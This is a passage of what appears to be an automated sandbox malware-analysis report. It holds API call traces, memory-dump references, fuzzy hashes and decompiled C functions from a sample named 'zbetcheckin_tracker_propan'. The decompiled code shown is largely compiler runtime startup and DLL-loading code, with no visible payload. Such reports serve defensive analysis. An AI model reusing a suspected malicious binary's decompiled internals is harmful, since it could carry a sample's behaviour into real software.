        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: c0754243ac0d2bfc2dc1229629f71bf7dba54ea6e76eba3c4468230c8012a48d
      • Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
      • Opcode Fuzzy Hash: c0754243ac0d2bfc2dc1229629f71bf7dba54ea6e76eba3c4468230c8012a48d
      • Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: f568f0c93e81694651aeeffcda5ff00ca06187ec5d1572f8587aee3ff8a5c14b
      • Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
      • Opcode Fuzzy Hash: f568f0c93e81694651aeeffcda5ff00ca06187ec5d1572f8587aee3ff8a5c14b
      • Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 76c26cb1d6e79ac60315d955688b02f63a3d2b90a0e78c532f730ade256a2d8a
      • Instruction ID: 5e70ccba1fdb92b0b43ce2b70833c0eff394bed0fab80c2a971d8471ba215f2f
      • Opcode Fuzzy Hash: 76c26cb1d6e79ac60315d955688b02f63a3d2b90a0e78c532f730ade256a2d8a
      • Instruction Fuzzy Hash: C5A001A66BA505BC3108A2966E0AC3B121CC5D2B62330851FFC02D9391AC912C669532
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 63ad11a56ea6014ffd6d5e2579c2eddfa40b42ccf47f69563f2dc0e22ca1654e
      • Instruction ID: 09d52f305f04874c69d39c1de288d9a156a16f9981be09de28995e69aa1f87e4
      • Opcode Fuzzy Hash: 63ad11a56ea6014ffd6d5e2579c2eddfa40b42ccf47f69563f2dc0e22ca1654e
      • Instruction Fuzzy Hash: 32A001962BE506FC310862966E0AC3B121CC5C6BA1330891FF802C9391AC912C669532
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 803f42b275ea04527033e0a4e6e6a9e3db7977224ae1cb03b8f95e52dbb0e2cf
      • Instruction ID: 4b3855cd2639c76e23c1f15104c00c8ca1dcc84a9627e7b7666da124b4e1424d
      • Opcode Fuzzy Hash: 803f42b275ea04527033e0a4e6e6a9e3db7977224ae1cb03b8f95e52dbb0e2cf
      • Instruction Fuzzy Hash: 4DA01182ABA002BC3008222A2E0AC3B022CC0C0BA03B0800FF80080380A8C02CA28032
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 1e6a4bf776b83db4d862c3a2a685f5d753cccc0a1543d1c60257d944bf5d618f
      • Instruction ID: 09d52f305f04874c69d39c1de288d9a156a16f9981be09de28995e69aa1f87e4
      • Opcode Fuzzy Hash: 1e6a4bf776b83db4d862c3a2a685f5d753cccc0a1543d1c60257d944bf5d618f
      • Instruction Fuzzy Hash: 32A001962BE506FC310862966E0AC3B121CC5C6BA1330891FF802C9391AC912C669532
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B03
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 5680dd16d6ab4a663cc64d8e11742b703ea51b15d98a7f1509655671336015a7
      • Instruction ID: 65ac945daec855dcc2468380a6be0a24e06623c19d1e401a61216e8afd8c701d
      • Opcode Fuzzy Hash: 5680dd16d6ab4a663cc64d8e11742b703ea51b15d98a7f1509655671336015a7
      • Instruction Fuzzy Hash: 6DA001962BA902BC7108A2526E1AC3B022CC5C2B21331891FF941D4391ACC12C6A9436
      C-Code - Quality: 76%
      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t30;
      				signed int _t40;
      				signed int _t41;
      				signed int _t43;
      				CHAR* _t44;
      				signed int _t46;
      				signed int _t47;
      				signed int _t48;
      				void* _t49;
      				intOrPtr _t50;
      				intOrPtr _t52;
      				signed int _t68;
      				void* _t69;
      				void* _t70;
      				signed int _t71;
      				long _t74;
      				signed int _t78;
      				struct _OSVERSIONINFOA* _t80;
      				long _t81;
      				void* _t82;
      
      				E0040FD83(); // executed
      				_push(0x60);
      				_push(0x418c10);
      				E0040D48C(__ebx, __edi, __esi);
      				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
      				GetStartupInfoA(_t82 - 0x70);
      				 *(_t82 - 4) = 0xfffffffe;
      				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x94);
      				if(_t80 != 0) {
      					_t80->dwOSVersionInfoSize = 0x94;
      					_t30 = GetVersionExA(_t80); // executed
      					_push(_t80);
      					_push(0);
      					__eflags = _t30;
      					if(_t30 != 0) {
      						 *(_t82 - 0x20) = _t80->dwPlatformId;
      						 *(_t82 - 0x24) = _t80->dwMajorVersion;
      						 *(_t82 - 0x28) = _t80->dwMinorVersion;
      						_t78 = _t80->dwBuildNumber & 0x00007fff;
      						HeapFree(GetProcessHeap(), ??, ??);
      						_t81 =  *(_t82 - 0x20);
      						__eflags = _t81 - 2;
      						if(_t81 != 2) {
      							_t78 = _t78 | 0x00008000;
      							__eflags = _t78;
      						}
      						_t68 =  *(_t82 - 0x24);
      						_t74 =  *(_t82 - 0x28);
      						 *0x43607c = _t81;
      						 *0x436084 = (_t68 << 8) + _t74;
      						 *0x436088 = _t68;
      						 *0x43608c = _t74;
      						 *0x436080 = _t78;
      						 *(_t82 - 0x20) = E0040C7F1((_t68 << 8) + _t74);
      						_t40 = E0040ED3B(1, _t74, _t78, 1);
      						_pop(_t69);
      						__eflags = _t40;
      						if(_t40 == 0) {
      							E0040C7CD(_t40, _t81);
      							_t69 = 0x1c;
      						}
      						_t41 = E0040FBFF(1);
      						__eflags = _t41;
      						if(_t41 == 0) {
      							E0040C7CD(_t41, _t81);
      							_t69 = 0x10;
      						}
      						E0040F808();
      						 *(_t82 - 4) = 1;
      						_t43 = E0040F5C8(1, _t74, _t78, _t81, __eflags);
      						__eflags = _t43;
      						if(_t43 < 0) {
      							E0040CDF0(_t74, 0x1b);
      							_pop(_t69); // executed
      						}
      						_t44 = GetCommandLineA(); // executed
      						 *0x436c14 = _t44;
      						 *0x436068 = E0040F493(); // executed
      						_t46 = E0040F3DA(_t69); // executed
      						__eflags = _t46;
      						if(_t46 < 0) {
      							E0040CDF0(_t74, 8);
      							_pop(_t69);
      						}
      						_t47 = E0040F167(_t69, _t74);
      						__eflags = _t47;
      						if(_t47 < 0) {
      							E0040CDF0(_t74, 9);
      						}
      						_t48 = E0040CF0C(1, _t78, _t81, _t82, 1);
      						_pop(_t70);
      						__eflags = _t48;
      						if(_t48 != 0) {
      							E0040CDF0(_t74, _t48);
      							_pop(_t70);
      						}
      						_t49 = E0040F10A(_t70);
      						__eflags =  *(_t82 - 0x44) & 1;
      						if(__eflags == 0) {
      							_t71 = 0xa;
      						} else {
      							_t71 =  *(_t82 - 0x40) & 0x0000ffff;
      						}
      						_t50 = E00408C00(__eflags, 0x400000, 0, _t49, _t71); // executed
      						 *((intOrPtr*)(_t82 - 0x1c)) = _t50;
      						__eflags =  *(_t82 - 0x20);
      						if( *(_t82 - 0x20) == 0) {
      							E0040D06C(_t50);
      						}
      						E0040D08E();
      						 *(_t82 - 4) = 0xfffffffe;
      						_t52 =  *((intOrPtr*)(_t82 - 0x1c));
      					} else {
      						HeapFree(GetProcessHeap(), ??, ??);
      						goto L26;
      					}
      				} else {
      					_push(0x12);
      					E0040C7CD(_t29, _t80);
      					L26:
      					_t52 = 0xff;
      				}
      				return E0040D4D1(_t52);
      			}























      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: 1df5aab26cce6a590467ba8984cd46d13c7e9d27c19c7d2ffe64352157d2ad9f
      • Instruction ID: 77a98e662e54e322b8ad65453a57a911915f1f33a9c59b42746a43509019c595
      • Opcode Fuzzy Hash: 1df5aab26cce6a590467ba8984cd46d13c7e9d27c19c7d2ffe64352157d2ad9f
      • Instruction Fuzzy Hash:
      C-Code - Quality: 88%
      			E0040240C(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
      				void* __ecx;
      				void* __esi;
      				void* _t20;
      				void* _t22;
      				void* _t23;
      				intOrPtr _t24;
      				void* _t26;
      
      				_t24 = __edx;
      				_t22 = 8;
      				_t26 = E00401046(0x318);
      				if(_t26 != 0) {
      					memset(_t26, 0, 0x318);
      					asm("cdq");
      					 *((intOrPtr*)(_t26 + 8)) = _a8;
      					 *((intOrPtr*)(_t26 + 0xc)) = _t24;
      					asm("cdq");
      					 *((intOrPtr*)(_t26 + 0x10)) = _a12;
      					 *((intOrPtr*)(_t26 + 0x14)) = _t24;
      					if((_a16 & 0x00000010) != 0) {
      						L4:
      						_t20 = E004022EC(_a4, _t23, _t24, _t26); // executed
      					} else {
      						_t31 =  *0x405480 & 0x00000001;
      						if(( *0x405480 & 0x00000001) == 0) {
      							goto L4;
      						} else {
      							_t20 = E0040219B(_t23, _t24, _t26, _t31, _a4);
      						}
      					}
      					_t22 = _t20;
      					E0040105B(_t26);
      				}
      				return _t22;
      			}











      APIs
        • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052
      • memset.NTDLL ref: 0040242B
        • Part of subcall function 004022EC: memset.NTDLL ref: 0040230E
        • Part of subcall function 004022EC: memcpy.NTDLL(00000218,00402E72,00000100,?,00010003,?,?,00000318,00000008), ref: 00402389
        • Part of subcall function 004022EC: RtlNtStatusToDosError.NTDLL ref: 004023DE
        • Part of subcall function 004022EC: GetLastError.KERNEL32(?,00000318,00000008), ref: 004023FC
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
        • Part of subcall function 0040219B: memset.NTDLL ref: 004021C1
        • Part of subcall function 0040219B: memcpy.NTDLL ref: 004021E9
        • Part of subcall function 0040219B: GetLastError.KERNEL32(00000010,00000218,00402E4D,00000100,?,00000318,00000008), ref: 00402200
        • Part of subcall function 0040219B: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402E4D,00000100), ref: 004022DE
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Error$Lastmemset$Heapmemcpy$AllocFreeStatus
      • String ID:
      • API String ID: 1319484078-0
      • Opcode ID: 05c3c156d6a564b4d23f0c9494294d2605850215a57035f04da3c0b06525babc
      • Instruction ID: 0ebad9c16cd1f448e78e70fc10c038a5f21bde38a53b80f23977230a8da96151
      • Opcode Fuzzy Hash: 05c3c156d6a564b4d23f0c9494294d2605850215a57035f04da3c0b06525babc
      • Instruction Fuzzy Hash: 520126305013086BC3209F29DD49B5B3BE8AB41718F00803FFC44A72C1D3B9EA4487A9
      APIs
      • Sleep.KERNELBASE(000001F4), ref: 002D52B8
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Sleep
      • String ID:
      • API String ID: 3472027048-0
      • Opcode ID: 240481b2703b06abb3b32220f7777ba63a11894a459c5872929ab18172d29a07
      • Instruction ID: 80327a43b451eb379482cd2688edaceaded5181abad989fad5a20482b8df6c8d
      • Opcode Fuzzy Hash: 240481b2703b06abb3b32220f7777ba63a11894a459c5872929ab18172d29a07
      • Instruction Fuzzy Hash: 11F08771D10229EFDB00DBA8C88CAEDB7B8EF05314F1481ABE912A3280C7B06E44DF51

      Non-executed Functions

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: .$.$.$C\.x$C\apeee$C\efee$\.x$apeee$e$e$e$e$e$e$l.x$l.x$sl.x$x$x$x
      • API String ID: 0-254566416
      • Opcode ID: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
      • Instruction ID: 5af075b26bbb76dd52ecc78308d545c852a0536055e6caa377d33dd12b444db4
      • Opcode Fuzzy Hash: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
      • Instruction Fuzzy Hash: F0E15F10A24216C9DB30AF00C8446FAB3F1FF21B19FD8D5C9C4985A651F7729DDACBA9
      C-Code - Quality: 64%
      			E00412282(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
      				signed int _v8;
      				char _v12;
      				char _v16;
      				intOrPtr _v20;
      				char _v24;
      				signed int _v28;
      				char _v36;
      				void* __ebx;
      				void* __edi;
      				intOrPtr _t26;
      				intOrPtr _t27;
      				intOrPtr _t28;
      				signed int _t32;
      				intOrPtr _t33;
      				signed int _t37;
      				signed int _t42;
      				_Unknown_base(*)()* _t44;
      				intOrPtr _t46;
      				intOrPtr _t48;
      				signed int _t54;
      				void* _t63;
      				void* _t68;
      				void* _t71;
      				struct HINSTANCE__* _t72;
      				intOrPtr _t73;
      				intOrPtr* _t75;
      				intOrPtr _t77;
      
      				_t71 = __edx;
      				_t26 = E0040F8B3();
      				_t77 =  *0x4366cc; // 0x0
      				_v20 = _t26;
      				_v8 = 0;
      				_v12 = 0;
      				_v16 = 0;
      				if(_t77 != 0) {
      					L9:
      					_t27 =  *0x4366d8; // 0x0
      					_t73 = _v20;
      					__eflags = _t27 - _t73;
      					if(_t27 == _t73) {
      						L19:
      						_t28 =  *0x4366d0; // 0x0
      						__eflags = _t28 - _t73;
      						if(_t28 != _t73) {
      							_t32 =  *((intOrPtr*)(E0040F8BC(_t28)))();
      							__eflags = _t32;
      							_v8 = _t32;
      							if(_t32 != 0) {
      								_t33 =  *0x4366d4; // 0x0
      								__eflags = _t33 - _t73;
      								if(_t33 != _t73) {
      									_push(_v8);
      									_v8 =  *((intOrPtr*)(E0040F8BC(_t33)))();
      								}
      							}
      						}
      						L23:
      						_push(_a12);
      						_push(_a8);
      						_push(_a4);
      						_push(_v8);
      						return  *((intOrPtr*)(E0040F8BC( *0x4366cc)))();
      					}
      					__eflags =  *0x4366dc - _t73; // 0x0
      					if(__eflags == 0) {
      						goto L19;
      					}
      					_t37 =  *((intOrPtr*)(E0040F8BC(_t27)))();
      					__eflags = _t37;
      					if(_t37 == 0) {
      						L14:
      						__eflags = E0040CED0( &_v16);
      						_pop(_t63);
      						if(__eflags != 0) {
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							E0040CA26(0, _t63, _t71, _t72, __eflags);
      						}
      						__eflags = _v16 - 4;
      						if(_v16 < 4) {
      							_a12 = _a12 | 0x00040000;
      						} else {
      							_a12 = _a12 | 0x00200000;
      						}
      						goto L23;
      					}
      					_push( &_v24);
      					_push(0xc);
      					_push( &_v36);
      					_push(1);
      					_push(_t37);
      					_t42 =  *((intOrPtr*)(E0040F8BC( *0x4366dc)))();
      					__eflags = _t42;
      					if(_t42 == 0) {
      						goto L14;
      					}
      					__eflags = _v28 & 0x00000001;
      					if((_v28 & 0x00000001) != 0) {
      						goto L19;
      					}
      					goto L14;
      				}
      				_t72 = LoadLibraryA("USER32.DLL");
      				if(_t72 != 0) {
      					_t44 = GetProcAddress(_t72, "MessageBoxA");
      					__eflags = _t44;
      					if(_t44 == 0) {
      						goto L2;
      					} else {
      						_t46 = E0040F850(_t44);
      						 *_t75 = "GetActiveWindow";
      						 *0x4366cc = _t46;
      						_t48 = E0040F850(GetProcAddress(??, ??));
      						 *_t75 = "GetLastActivePopup";
      						 *0x4366d0 = _t48;
      						 *0x4366d4 = E0040F850(GetProcAddress(_t72, _t72));
      						__eflags = E0040CE99( &_v12);
      						_pop(_t68);
      						if(__eflags != 0) {
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							E0040CA26(0, _t68, _t71, _t72, __eflags);
      							_t75 = _t75 + 0x14;
      						}
      						__eflags = _v12 - 2;
      						if(_v12 == 2) {
      							_t54 = E0040F850(GetProcAddress(_t72, "GetUserObjectInformationA"));
      							__eflags = _t54;
      							 *0x4366dc = _t54;
      							if(_t54 != 0) {
      								 *0x4366d8 = E0040F850(GetProcAddress(_t72, "GetProcessWindowStation"));
      							}
      						}
      						goto L9;
      					}
      				}
      				L2:
      				return 0;
      			}































      APIs
      • LoadLibraryA.KERNEL32 ref: 004122AF
      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122CE
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
        • Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
        • Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
        • Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7
      • GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122E7
      • GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122FC
      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA,?,?,?,00436218,0040EEF7,00436218), ref: 00412331
      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,00436218,0040EEF7,00436218), ref: 00412349
        • Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
        • Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
        • Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
        • Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
        • Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
